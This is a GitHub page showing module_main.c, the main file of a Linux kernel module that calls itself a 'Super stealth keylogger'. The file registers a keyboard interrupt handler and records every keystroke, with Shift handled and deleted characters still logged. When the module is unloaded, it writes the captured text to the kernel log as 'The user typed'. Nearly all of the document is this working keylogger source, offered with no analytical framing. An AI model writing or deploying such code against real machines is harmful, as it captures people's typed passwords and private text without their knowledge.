-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmodule_main.c
99 lines (80 loc) · 2.25 KB
/
module_main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/list.h>
#include <linux/slab.h>
#include "keylogger.h"
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Thomas Vermeilh <thomas.vermeilh@gmail.com>");
MODULE_DESCRIPTION("Keylogger module");
MODULE_VERSION("0.1");
/* The global structure */
struct keylogger keylogger = {
.lock = __MUTEX_INITIALIZER(keylogger.lock),
.entries = LIST_HEAD_INIT(keylogger.entries),
};
static int __init hello_init(void)
{
int error = 0;
printk(KERN_INFO "Super stealth keylogger module starts !\n");
error = ft_create_dev_file();
if (error) {
printk(KERN_ERR "Creating misc device failed.\n");
return error;
}
if (init_keylogger_irq(&keylogger)) {
printk(KERN_ERR "Registering irq handler failed.\n");
return -EIO;
}
return error;
}
/*
* Parse the keylogger entries list and print everything to the kernel log
* in a human friendly way
*/
static void write_entries_to_log(void)
{
struct keylogger_entry *e;
bool shift = 0;
mutex_lock(&keylogger.lock);
printk(KERN_INFO "The user typed :\n");
list_for_each_entry(e, &keylogger.entries, list) {
if (strncmp(e->key.name, "Shift", 5) == 0) {
shift = !e->released;
continue;
}
/* Don't care about released key here */
if (e->released)
continue;
if (strncmp(e->key.name, "Backspace", KEYNAME_LEN) == 0)
/* User pressed backspace but we still want to log
* what he deleted so we write a '<' instead */
printk(KERN_CONT "<");
else if (strncmp(e->key.name, "Enter", KEYNAME_LEN) == 0)
printk(KERN_CONT "\n");
else if (e->key.ascii != ASCII_UNDEFINED)
printk(KERN_CONT "%c",
shift ? e->key.ascii_uppercase : e->key.ascii);
}
mutex_unlock(&keylogger.lock);
}
static void __exit hello_cleanup(void)
{
struct keylogger_entry *entry;
printk(KERN_INFO "Cleaning up keylogger module.\n");
free_keylogger_irq(&keylogger);
ft_delete_dev_file();
write_entries_to_log();
/* Free the entries */
mutex_lock(&keylogger.lock);
while (!list_empty(&keylogger.entries)) {
entry = list_first_entry(&keylogger.entries,
struct keylogger_entry, list);
list_del(&entry->list);
kfree(entry);
}
mutex_unlock(&keylogger.lock);
printk(KERN_INFO "Module removed\n");
}
module_init(hello_init);
module_exit(hello_cleanup);